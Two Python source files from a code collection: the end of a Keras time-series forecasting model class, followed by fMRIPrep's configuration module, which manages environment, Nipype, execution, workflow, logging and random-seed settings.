logging.info(str(e))
train_time_ranges_excluded = []
self.cfg_model()[mods_model.__TRAIN_TIME_RANGES_EXCLUDED] = train_time_ranges_excluded
def get_train_time_ranges_ecluded(self):
train_time_ranges_excluded = self.cfg_model()[mods_model.__TRAIN_TIME_RANGES_EXCLUDED]
try:
train_time_ranges_excluded = [r.from_str() for r in train_time_ranges_excluded]
except Exception as e:
logging.info(str(e))
train_time_ranges_excluded = []
return train_time_ranges_excluded
def set_test_time_ranges_excluded(self, test_time_ranges_excluded):
try:
test_time_ranges_excluded = [r.to_str() for r in test_time_ranges_excluded]
except Exception as e:
logging.info(str(e))
test_time_ranges_excluded = []
self.cfg_model()[mods_model.__TEST_TIME_RANGES_EXCLUDED] = test_time_ranges_excluded
def get_test_time_ranges_ecluded(self):
try:
test_time_ranges_excluded = self.cfg_model()[mods_model.__TEST_TIME_RANGES_EXCLUDED]
except Exception as e:
logging.info(str(e))
test_time_ranges_excluded = []
return test_time_ranges_excluded
def set_training_time(self, training_time):
self.__metrics[self.__TRAINING_TIME] = training_time
def get_training_time(self):
# backward compatibility
try:
t = self.cfg_model()[mods_model.__TRAINING_TIME]
if t is not None:
return t
except Exception as e:
logging.info(str(e))
return self.__metrics[self.__TRAINING_TIME]
def get_scaler(self):
if not self.__scaler:
self.__scaler = MinMaxScaler(feature_range=(0, 1))
return self.__scaler
def set_scaler(self, scaler):
self.__scaler = scaler
def set_sample_data(self, df):
self.sample_data = df
def update_metrics(self, metrics):
self.__metrics.update(metrics)
def get_metrics(self):
return self.__metrics
def train(
self,
df_train,
sequence_len=cfg.sequence_len,
model_delta=cfg.model_delta,
interpolate=cfg.interpolate,
model_type=cfg.model_type,
num_epochs=cfg.num_epochs,
epochs_patience=cfg.epochs_patience,
blocks=cfg.blocks,
stacked_blocks=cfg.stacked_blocks,
steps_ahead=cfg.steps_ahead,
batch_size=cfg.batch_size,
batch_normalization=cfg.batch_normalization,
dropout_rate=cfg.dropout_rate
):
multivariate = len(df_train.columns)
self.set_multivariate(multivariate)
if sequence_len is None:
sequence_len = self.get_sequence_len()
else:
self.set_sequence_len(sequence_len)
if model_delta is None:
model_delta = self.is_delta()
else:
self.set_model_delta(model_delta)
if interpolate is None:
interpolate = self.get_interpolate()
else:
self.set_interpolate(interpolate)
if model_type is None:
model_type = self.get_model_type()
else:
self.set_model_type(model_type)
if num_epochs is None:
num_epochs = self.get_epochs()
else:
self.set_epochs(num_epochs)
if epochs_patience is None:
epochs_patience = self.get_epochs_patience()
else:
self.set_epochs_patience(epochs_patience)
if blocks is None:
blocks = self.get_blocks()
else:
self.set_blocks(blocks)
if stacked_blocks is None:
stacked_blocks = self.get_stacked_blocks()
else:
self.set_stacked_blocks(stacked_blocks)
if steps_ahead is None:
steps_ahead = self.get_steps_ahead()
else:
self.set_steps_ahead(steps_ahead)
if batch_size is None:
batch_size = self.get_batch_size()
else:
self.set_batch_size(batch_size)
if batch_normalization is None:
batch_normalization = self.get_batch_normalization()
else:
self.set_batch_normalization(batch_normalization)
if dropout_rate is None:
dropout_rate = self.get_dropout_rate()
else:
self.set_dropout_rate(dropout_rate)
# Define model
h = None
x = Input(shape=(sequence_len, multivariate))
if model_type == 'MLP': # MLP
h = Dense(units=multivariate, activation='relu')(x)
h = Flatten()(h)
elif model_type == 'autoencoderMLP': # autoencoder MLP
nn = [128, 64, 32, 16, 32, 64, 128]
h = Dense(units=nn[0], activation='relu')(x)
for n in nn[1:]:
h = Dense(units=n, activation='relu')(h)
h = Flatten()(h)
elif model_type == 'Conv1D': # CNN
h = Conv1D(filters=64, kernel_size=2, activation='relu')(x)
h = MaxPooling1D(pool_size=2)(h)
h = Flatten()(h)
elif model_type == 'TCN': # https://pypi.org/project/keras-tcn/
h = TCN(return_sequences=False)(x)
elif model_type == 'stackedTCN' and stacked_blocks > 1: # stacked TCN
h = TCN(return_sequences=True)(x)
if stacked_blocks > 2:
for i in range(stacked_blocks - 2):
h = TCN(return_sequences=True)(h)
h = TCN(return_sequences=False)(h)
elif model_type == 'GRU': # GRU
h = GRU(cfg.blocks)(x)
elif model_type == 'LSTM': # LSTM
h = LSTM(cfg.blocks)(x)
elif model_type == 'bidirectLSTM': # bidirectional LSTM
h = Bidirectional(LSTM(cfg.blocks))(x)
elif model_type == 'attentionLSTM': # https://pypi.org/project/keras-self-attention/
h = Bidirectional(LSTM(cfg.blocks, return_sequences=True))(x)
h = SeqSelfAttention(attention_activation='sigmoid')(h)
h = Flatten()(h)
elif model_type == 'seq2seqLSTM':
h = LSTM(cfg.blocks)(x)
h = RepeatVector(sequence_len)(h)
h = LSTM(cfg.blocks)(h)
elif model_type == 'stackedLSTM' and stacked_blocks > 1: # stacked LSTM
h = LSTM(cfg.blocks, return_sequences=True)(x)
if stacked_blocks > 2:
for i in range(stacked_blocks - 2):
h = LSTM(cfg.blocks, return_sequences=True)(h)
h = LSTM(cfg.blocks)(h)
if h is None:
raise Exception('model not specified (h is None)')
y = Dense(units=multivariate, activation='sigmoid')(h) # 'softmax' for multiclass classification
self.model = Model(inputs=x, outputs=y)
# Drawing model
logging.info(self.model.summary())
# Optimizer
opt = Adam(clipnorm=1.0, clipvalue=0.5)
# Compile model
self.model.compile(
loss='mean_squared_error', # Adam
optimizer=opt, # 'adam', 'adagrad', 'rmsprop', opt
metrics=['mse', 'mae']) # 'cosine', 'mape'
# Checkpointing and earlystopping
filepath = os.path.join(cfg.app_checkpoints, self.name + '-{epoch:02d}.hdf5')
checkpoints = ModelCheckpoint(
filepath,
monitor='loss',
save_best_only=True,
mode='min',  # 'loss' is monitored, so the best checkpoint is the minimum
verbose=1
)
earlystops = EarlyStopping(
monitor='loss',
patience=epochs_patience,
verbose=1
)
callbacks_list = [checkpoints, earlystops]
# launch tensorboard
if cfg.launch_tensorboard:
logging.info('launching Tensorboard')
subprocess.run(['fuser', '-k', '{}/tcp'.format(cfg.app_tensorboard_port)]) # kill any previous process in that port
p = Process(target=launch_tensorboard, args=(cfg.app_tensorboard_port, cfg.app_tensorboard_logdir), daemon=True)
p.start()
logging.info('Tensorboard PID:%d' % p.pid)
tensorboard = TensorBoard(log_dir=os.path.join(cfg.app_tensorboard_logdir, "{}".format(time.time())))
callbacks_list.append(tensorboard)
logging.info('Tensorboard callback was added to the callback list')
# Replace None by 0
df_train.replace('None', 0, inplace=True)
# Fill missing values by interpolation
if self.get_interpolate():
df_train.interpolate(inplace=True)
# Data transformation
# df_train = df_train.values.astype('float32')
df_train = self.transform(df_train)
df_train = self.normalize(df_train, self.get_scaler())
tsg_train = self.get_tsg(df_train, steps_ahead=steps_ahead, batch_size=batch_size)
if cfg.MODS_DEBUG_MODE:
# TODO:
logging.info(self.config)
start_time = time.time()
self.model.fit_generator(
tsg_train,
epochs=num_epochs,
callbacks=callbacks_list
)
training_time = time.time() - start_time
self.set_training_time(training_time)
logging.info('training time: %s' % training_time)
def plot(self, *args):
logging.info('this method is not yet implemented')
def __init(self):
logging.info('Initializing model')
if self.sample_data is not None:
self.predict(self.sample_data)
logging.info('Model initialized')
# First order differential for numpy array y' = d(y)/d(t) = f(y,t)
# be careful: len(dt) == len(data)-1
# e.g., [5,2,9,1] --> [2-5,9-2,1-9] == [-3,7,-8]
def delta(self, df):
if isinstance(df, pd.DataFrame):
# pandas data frame
return df.diff(periods=1, axis=0)[1:]
# numpy ndarray
return df[1:] - df[:-1]
def transform(self, df):
if self.is_delta():
return self.delta(df)
else:
# bucketing, taxo, fuzzy
return df
def inverse_transform(self, original, pred_denorm):
if self.is_delta():
beg = self.get_sequence_len() - self.get_steps_ahead() + 1
y = original[beg:]
utl.dbg_df(y, self.name, 'y.tsv', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
d = pred_denorm
utl.dbg_df(d, self.name, 'd.tsv', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
return y + d
else:
return pred_denorm
# normalizes data, returns np.ndarray
def normalize(self, df, scaler, fit=True):
# Scale all metrics but each separately
df = scaler.fit_transform(df) if fit else scaler.transform(df)
utl.dbg_scaler(scaler, 'normalize', debug=cfg.MODS_DEBUG_MODE)
return df
# inverse method to @normalize
def inverse_normalize(self, df):
scaler = self.get_scaler()
utl.dbg_scaler(scaler, 'inverse_normalize', debug=cfg.MODS_DEBUG_MODE)
return scaler.inverse_transform(df)
def get_tsg(self, df,
steps_ahead=cfg.steps_ahead,
batch_size=cfg.batch_size
):
x = y = df
length = self.get_sequence_len()
if steps_ahead > 1:
x = df[:-(steps_ahead - 1)]
y = df[steps_ahead - 1:]
return TimeseriesGenerator(
x,
y,
length=length,
sampling_rate=1,
stride=1,
batch_size=batch_size
)
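# Illustrative example (not executed): with sequence_len=3 and steps_ahead=2,
# x = df[:-1] and y = df[1:], so for df = [d0, ..., d9] the first generated
# sample pairs the window (d0, d1, d2) with target d4, that is, the value
# two steps after the window's last element.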
def predict(self, df):
utl.dbg_df(df, self.name, 'original', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
if self.get_interpolate():
df = df.interpolate()
utl.dbg_df(df, self.name, 'interpolated', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
trans = self.transform(df)
utl.dbg_df(trans, self.name, 'transformed', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
norm = self.normalize(trans, self.get_scaler(), fit=False)
utl.dbg_df(norm, self.name, 'normalized', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
# append steps_ahead dummy (NaN) rows at the end of the normalized
# np.ndarray so the TimeseriesGenerator also emits the last sample,
# which predicts the future state
dummy = [np.nan] * self.get_multivariate()
for i in range(self.get_steps_ahead()):
norm = np.append(norm, [dummy], axis=0)
utl.dbg_df(norm, self.name, 'normalized+nan', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
tsg = self.get_tsg(norm, steps_ahead=self.get_steps_ahead(), batch_size=self.get_batch_size())
utl.dbg_tsg(tsg, 'norm_tsg', debug=cfg.MODS_DEBUG_MODE)
pred = self.model.predict_generator(tsg)
utl.dbg_df(pred, self.name, 'prediction', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
pred_denorm = self.inverse_normalize(pred)
utl.dbg_df(pred_denorm, self.name, 'pred_denormalized', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
pred_invtrans = self.inverse_transform(df, pred_denorm)
utl.dbg_df(pred_invtrans, self.name, 'pred_inv_trans', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
if isinstance(pred_invtrans, pd.DataFrame):
pred_invtrans = pred_invtrans.values
return pred_invtrans
# This function wraps pandas.read_csv() and reads the csv data
def read_file_or_buffer(self, *args, **kwargs):
try:
fill_missing_rows_in_timeseries = kwargs['fill_missing_rows_in_timeseries']
except Exception:
fill_missing_rows_in_timeseries = False
if kwargs is not None:
kwargs = {k: v for k, v in kwargs.items() if k in [
'usecols', 'sep', 'skiprows', 'skipfooter', 'engine', 'header'
]}
if 'usecols' in kwargs:
if isinstance(kwargs['usecols'], str):
kwargs['usecols'] = [
utl.parse_int_or_str(col)
for col in kwargs['usecols'].split(',')
]
if 'header' in kwargs:
if isinstance(kwargs['header'], str):
kwargs['header'] = [
utl.parse_int_or_str(col)
for col in kwargs['header'].split(',')
]
if len(kwargs['header']) == 1:
kwargs['header'] = kwargs['header'][0]
df = pd.read_csv(*args, **kwargs)
if fill_missing_rows_in_timeseries is True:
df = utl.fill_missing_rows(df)
return df
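# Illustrative call on a mods_model instance (the file name is hypothetical;
# the column names are the defaults used elsewhere in this module):
#   df = m.read_file_or_buffer('data.tsv', sep='\t', engine='python',
#                              usecols='number_of_conn,sum_orig_kbytes',
#                              header='0', fill_missing_rows_in_timeseries=True)
# String 'usecols'/'header' values are split on ',' and parsed with
# utl.parse_int_or_str before being forwarded to pandas.read_csv.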
def eval(self, df):
interpol = df
if self.get_interpolate():
interpol = df.interpolate()
interpol = interpol.values.astype('float32')
# logging.info('interpolated:\n%s' % interpol)
trans = self.transform(interpol)
# logging.info('transformed:\n%s' % transf)
norm = self.normalize(trans, self.get_scaler())
# logging.info('normalized:\n%s' % norm)
tsg = self.get_tsg(norm, self.get_steps_ahead(), cfg.batch_size_test)
return self.model.evaluate_generator(tsg)
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
r"""
A Python module to maintain unique, run-wide *fMRIPrep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<fmriprep_dir>/sub-<participant_id>/log/<run_unique_id>/fmriprep.toml``.
Settings are stored using :abbr:`TOML (Tom's Obvious, Minimal Language)`.
The module has a :py:func:`~fmriprep.config.to_filename` function to allow writing out
the settings to hard disk in *TOML* format, which looks like:
.. literalinclude:: ../fmriprep/data/tests/config.toml
:language: toml
:name: fmriprep.toml
:caption: **Example file representation of fMRIPrep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~fmriprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from fmriprep import config
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` module is responsible for other convenience actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Setting up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(
os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None
)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
CONFIG_FILENAME = "fmriprep.toml"
try:
set_start_method("forkserver")
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import sys
import random
from uuid import uuid4
from time import strftime
from pathlib import Path
from nipype import __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("FMRIPREP_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("FMRIPREP_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/nipreps/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
else:
import logging
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "fmriprep-docker" if _docker_ver else "docker"
del _cgroup
_fs_license = os.getenv("FS_LICENSE")
if not _fs_license and os.getenv("FREESURFER_HOME"):
_fs_home = os.getenv("FREESURFER_HOME")
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(
os.getenv(
"TEMPLATEFLOW_HOME", os.path.join(os.getenv("HOME"), ".cache", "templateflow")
)
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024 ** 3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if (
_oc_limit in ("0", "n/a")
and Path("/proc/sys/vm/overcommit_ratio").exists()
):
_oc_limit = "{}%".format(
Path("/proc/sys/vm/overcommit_ratio").read_text().strip()
)
except Exception:
pass
# Debug modes are names that influence the exposure of internal details to
# the user, either through additional derivatives or increased verbosity
DEBUG_MODES = ("compcor",)
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True, ignore=None):
"""Store settings from a dictionary."""
ignore = ignore or {}
for k, v in settings.items():
if k in ignore or v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
elif hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
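# Illustrative use of the section classes defined below (hypothetical values;
# init=False skips execution.init(), which would otherwise index a BIDS dataset):
#   execution.load({"output_dir": "/tmp/derivatives", "log_level": 15}, init=False)
#   # keys listed in _paths (e.g. "output_dir") are coerced to absolute pathlib.Paths,
#   # and execution.get() turns them back into plain strings for serialization.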
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *fMRIPrep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*fMRIPrep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config(
{
"monitoring": {
"enabled": cls.resource_monitor,
"sample_frequency": "0.5",
"summary_append": True,
}
}
)
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
"check_version": False, # disable future telemetry
}
}
)
if cls.omp_nthreads is None:
cls.omp_nthreads = min(
cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8
)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
sloppy = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
debug = []
"""Debug mode(s)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fmriprep_dir = None
"""Root of fMRIPrep BIDS Derivatives dataset. Depends on output_layout."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *fMRIPrep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_layout = None
"""Layout of derivatives within output_dir."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = f"{strftime('%Y%m%d-%H%M%S')}_{uuid4()}"
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fmriprep_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"output_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
_db_path = cls.bids_database_dir or (
cls.work_dir / cls.run_uuid / "bids_db"
)
_db_path.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
re.compile(r"^\."),
),
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4])
if not isinstance(v, Query) and "Query" in v
else v
for k, v in filters.items()
}
if "all" in cls.debug:
cls.debug = list(DEBUG_MODES)
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = "register"
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *fMRIPrep*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*fMRIPrep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = None
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = logging.getLogger("nipype.workflow")
"""NiPype's workflow logger."""
interface = logging.getLogger("nipype.interface")
"""NiPype's interface logger."""
utils = logging.getLogger("nipype.utils")
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config(
{"logging": {"log_directory": str(execution.log_dir), "log_to_file": True}}
)
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
_random_seed = None
master = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
numpy = None
"""Seed used by NumPy"""
@classmethod
def init(cls):
if cls._random_seed is not None:
cls.master = cls._random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
cls.numpy = _set_numpy_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ["ANTS_RANDOM_SEED"] = str(val)
return val
def _set_numpy_seed():
"""NumPy's random seed is independant from Python's `random` module"""
import numpy as np
val = random.randint(1, 65536)
np.random.seed(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.load(settings)
loggers.init()
def load(filename, skip=None):
"""Load settings from file."""
from toml import loads
skip = skip or {}
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
ignore = skip.get(sectionname)
section.load(configs, ignore=ignore)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
